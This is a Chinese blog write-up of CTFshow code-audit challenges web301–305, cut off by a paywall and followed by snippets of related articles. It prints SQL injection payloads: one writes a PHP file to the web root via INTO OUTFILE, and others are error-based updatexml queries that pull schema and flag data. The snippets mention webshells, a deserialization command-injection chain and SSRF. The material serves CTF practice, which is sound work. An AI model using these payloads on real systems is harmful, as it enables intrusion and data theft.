CTFSHOW-WEB入门代码审计篇

最新推荐文章于 2025-02-11 23:46:55 发布
原创 最新推荐文章于 2025-02-11 23:46:55 发布 · 685 阅读 · 0
标签
#php
本文详细介绍了CTF比赛中的多个WEB安全题目,包括SQL注入、弱口令、文件包含、反序列化、SSRF等漏洞的利用方法。从checklogin.php的SQL注入开始,逐步揭示代码审计中的技巧,如利用sqlmap、payload构造、文件写入、数据库交互等,最终在不同阶段找到并利用漏洞获取flag。

web301

漏洞点checklogin.php

$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";

sqlmap一把梭出来账号密码登录拿到flag

web302

更改部分

if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){

sqlmap跑出来账号密码却不知为何无法登录,然后尝试写入webshell

payload

userid=a'%20union%20select%20"<?php%20phpinfo();?>"%20into%20outfile%20"/var/www/html/a.php"%23&userpwd=b

访问a.php

 写入一句话然后查看文件

 web303

弱口令admin admin登录

然后审计代码,发现在dptadd.php中提交的信息会通过inster存入到数据库中,但是并未做任何过滤,inster注入尝试

payload

123' and updatexml(1,concat(0x7e,database()),0)#

123' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#

123' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='sds_fl9g'),0x7e),1)#

123' and updatexml(1,concat(0x7e,substr((select group_concat(flag) from sds_fl9g),1,30),0x7e),1)#
123' and updatexml(1,concat(0x7e,substr((select group_concat(flag) from sds_fl9g),30,60),0x7e),1)#

web304

注入点处和上题没区别,按照上一题的payload走就好

web305

审计代码发现存在反序列化且用户和密码可控,file_put_contents尝试写入一句话


                

        

    





  


        

            

                      
                        
                        最低0.47元/天 解锁文章
                          
                      
            

        


    



              

                

              

            
              



	

		

			

				
					
CTFshow代码审计 web301-310

				
			

			

				

					cht6667的博客
				

				

					02-23
					
					1396
					
				

			

		

		

			
				
CTFshow代码审计部分个人做题记录

			
		

	



              


  
              

                


	

		

			

				
					
[CTFshow web入门]代码审计

				
			

			

				

					Npceer-一位网安初学者的博客
				

				

					08-09
					
					663
					
				

			

		

		

			
				
前言
最近状态不太对 挺迷茫的  就先回来写点题练习练习 暑假也进入后半段了 摸鱼摸不动了 最近就学一下代码审计吧 找几个小CMS复现一下漏洞 然后在跟这Y4和feng师傅的博客复现一些框架好了 也稍微学一下工具的使用 sqlmap啊seay啊啥的
文章目录前言web301web302web302
web301
基础题 随便看一下 sql语句没有任何过滤 直接联合注入就行
$sql="select sds_password from sds_user where sds_username='".$usern

			
		

	





	

		

			

				
					
ctf_show笔记web入门---代码审计

				
			

			

				

					whale_waves的博客
				

				

					03-13
					
					2006
					
				

			

		

		

			
				
在dao.php文件找到了当最后销毁序列化时调用close(__destruct魔法函数),  这里就要用到__construct魔法函数,  当执行new实例化的时候就会调用,  一会儿再去找哪里实例化了dao这个类,  将$this->config=new config()修改为$this->conn->=apt()这里$this->config->cache_dir指向了config类里的cache_dir变量,  刚好又是个public公共便变量可以修改。这里的'问好'像下面一样加密一下。

			
		

	



		

			
		



	

		

			

				
					
CTFshow--Web--代码审计

				
			

			

				

					pwfortune的博客
				

				

					07-29
					
					2271
					
				

			

		

		

			
				
service/service.php , 也存在 clearCache()的调用, 而且在logout.php里面require了service.php,查询不到内容, 会在数据库中创建一个数据 123 , 那么这个123就会作为一个返回的数据, 用以跟用户输入的密码进行比较 , 相匹配的话就行登录进去了。在index.php下面 ,能够调用 checkVersion()函数 , 虽然header 头跳转了,但是还是会执行后面的代码。向服务端发送请求时,服务端会等待我们发送数据,处于wait状态。

			
		

	





	

		

			

				
					
Ctfshow web入门 代码审计 web301-web310 详细题解 全

				
			

			

				

					Jay17的博客
				

				

					09-21
					
					4720
					
				

			

		

		

			
				
Ctfshow web入门 代码审计 web301-web310 详细题解 全

			
		

	





	

		

			

				
					
ctf_show笔记web入门---反序列化)

				
			

			

				

					whale_waves的博客
				

				

					03-19
					
					2658
					
				

			

		

		

			
				
例如$a = 1    $b = 2,  这时让$b = &$a,  再给$a 重新赋个值 $a = 3,  这个时候$b就会一直跟着$a变化,  $a是什么$b就是什么。利用php处理畸形的序列化的处理措施,  当php收到畸形的序列化时,  会因为对此序列化的不放心,  会第一时间处理掉它,  所以能直接让处理他的顺序排在了最前面。这时,  如果传入一个|O:5:"Class"类似于这样的序列化,  php就会自动把|前面的当作键名用,  反而会反序列化|后的值。

			
		

	





	

		

			

				
					
2024年CTFShow-Web详细wp(持续更新中ing)_ctfshow web wp,2024年最新【绝对干货

				
			

			

				

					2401_84264692的博客
				

				

					05-05
					
					726
					
				

			

		

		

			
				
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。

			
		

	





	

		

			

				
					
[CTF夺旗赛] CTFshow Web1-14 详细过程保姆级教程~

					
热门推荐

				
			

			

				

					Da1NtY的博客
				

				

					09-09
					
					2万+
					
				

			

		

		

			
				
CTFShow通常是指网络安全领域中的“Capture The Flag”(夺旗赛)展示工具或平台。这是一种用于分享、学习和展示信息安全竞赛中获取的信息、漏洞利用技巧以及解题思路的在线社区或软件。参与者会在比赛中收集“flag”,通常是隐藏在网络环境中的数据或密码形式,然后通过分析、破解等手段找到并提交。CTFShow可以帮助人们了解最新的安全技术和挑战,同时也促进了安全知识和技术的交流。

			
		

	





	

		

			

				
					
ctfshow代码审计

				
			

			

				

					qq_61768489的博客
				

				

					01-26
					
					2054
					
				

			

		

		

			
				
4476端口对应着 /var/flag目录,有个index.html文件,这和我们连上蚁剑后知道的一样。给的源码还是308,还是用fastcgi,这次直接写shell进去,因为flag文件不知道在哪。可以利用file_put_contents来写shell ,需要调用close()方法。思路与上题一样,不过是输入的password经过了一点加密,构造一下就行。sql注入写shell也是没问题的,因为sql语句依旧是正常执行了。似乎没有调用,与上题一样,换一种方式,有报错信息就试试报错注入。

			
		

	





	

		

			

				
					
ctfshow web307

				
			

			

				

					fmyyy1的博客
				

				

					07-14
					
					443
					
				

			

		

		

			
				
代码审计专题的
下载到源码

主要在dao.php和logout.php里面
dao.php里有个dao类,里面有个方法


在看logout.php

反序列化dao类 控制config里的cache_dir为我们的命令即可。
不过shell_exec函数有个特点

也就是说没回显,但写入文件就可以了,或者也可以反弹shell
<?php
class config{
    public $cache_dir = 'aaa/*;cat /var/www/html/flag.php > /va

			
		

	





	

		

			

				
					
CTFshow——代码审计

				
			

			

				

					D.MIND 的博客
				

				

					04-07
					
					1775
					
				

			

		

		

			
				
文章目录web301——SQL注入web301——SQL注入web303——报错注入web304——报错注入web305——web306——web307——
web301——SQL注入
将源码下载下来。主要看checklogin.php:
$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result=$mysqli->query($sql);
$row=

			
		

	





	

		

			

				
					
ctfshow持续更新中】web入门-代码审计

					
最新发布

				
			

			

				

					qq_55830703的博客
				

				

					02-11
					
					243
					
				

			

		

		

			
				
ctfshow-web入门-代码审计

			
		

	





	

		

			

				
					
ctfshow web入门 代码审计

				
			

			

				

					Sentiment的博客
				

				

					02-12
					
					3061
					
				

			

		

		

			
				
web301

			
		

	





	

		

			

				
					
ctfshow web308 ssrf

				
			

			

				

					fmyyy1的博客
				

				

					07-15
					
					533
					
				

			

		

		

			
				
在index.php里
$service = unserialize(base64_decode($_COOKIE['service']));
if($service){
    $lastVersion=$service->checkVersion();
}

在dao.php中有checkVersion方法

checkUpdate
function checkUpdate($url){
		$ch=curl_init();
		curl_setopt($ch, CURLOPT_URL, $ur.

			
		

	





	

		

			

				
					
ctfshow web入门 web306--web310源码审计

				
			

			

				

					2301_81040377的博客
				

				

					05-27
					
					866
					
				

			

		

		

			
				
链接:https://juejin.cn/post/7083293190022758407。访问1.php再rce就行了,但是不知道为啥我今天做不出来,弄了好一会了。商业转载请联系作者获得授权,非商业转载请注明出处。说的源码没变,这里我们写个EXP看配置文件。这些题都要在index.php发包才可以。我是终于找到了在一堆里面弄。这和之前的完全不一样了。作者:OceanSec。

			
		

	





	

		

			

				
					
ctfshow 代码审计

				
			

			

				

					qq_45951598的博客
				

				

					05-21
					
					911
					
				

			

		

		

			
				
web301
这里看了一下文件发现,就一些登入页面文件

然后简单看了一下文件,定位到checklogin.php这个文件,做个简单的代码审计
<?php
error_reporting(0);
session_start();
require 'conn.php';
$_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:"";   //判断当前传入的userid是否为空,空的话返回为空
$_POST['userpwd']=!empty(

			
		

	





	

		

			

				
					
CTF练习——代码审计

				
			

			

				

					HasntStartIsOver的博客
				

				

					06-04
					
					1181
					
				

			

		

		

			
				
页面无返回值,也没有报错。说明通过了所有拦截,但是文件不存在或者是空白的。在source.php中展示了源代码,下面进行源码分析。源码中注释了source.php,直接访问该页面。一次尝试 payload =,最后获得flag。

			
		

	





	

		

			

				
					
CTFshow 代码审计

				
			

			

				

					starttv的博客
				

				

					11-30
					
					1726
					
				

			

		

		

			
				
分析源码在dptadd.php有注入点,无过滤,但要求先登录,尝试弱口令admin,admin登录成功。所以我写入一个php查数据库的文件,可以正常查询。发现多了个class.php,并且在checklogin.php有反序列入口,到这里思路就清晰了。​协议的延时可以探测端口是否开放,开放的端口会保持连接,而未开放的端口会直接返回页面结果,经探测后。写入一句话木马后用蚁剑连接查数据库即可,数据库的用户名和密码可以在conn.php中找到。在index.php和login.php中发现反序列化入口。

			
		

	





	

		

			

				
					
代码审计2(ctfshow web305-307)

				
			

			

				

					m0_72929232的博客
				

				

					02-10
					
					429
					
				

			

		

		

			
				
通过dao类的__destruct方法调用log类的close方法,实现文件包含写入shell。访问反序列化的入口文件:/controller/logout.php触发反序列化再蚁剑连接。用户名密码都是admin先登录上去然后蚁剑连接/1.php并右键添加数据连接。在logout.php中有反序列化调用clearCache。dao.php里面有个shell_exec()index.php有反序列化入口。注意这里想到反序列化。

			
		

	





	

		

			

				
					
ctf.show WEB入门-代码审计

				
			

			

				

					~airrudder~
				

				

					11-30
					
					4797
					
				

			

		

		

			
				
ctfshow 代码审计 web301-web310

			
		

	



              




          





        



    





    



      

      

        
      

      





	

		评论	
	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值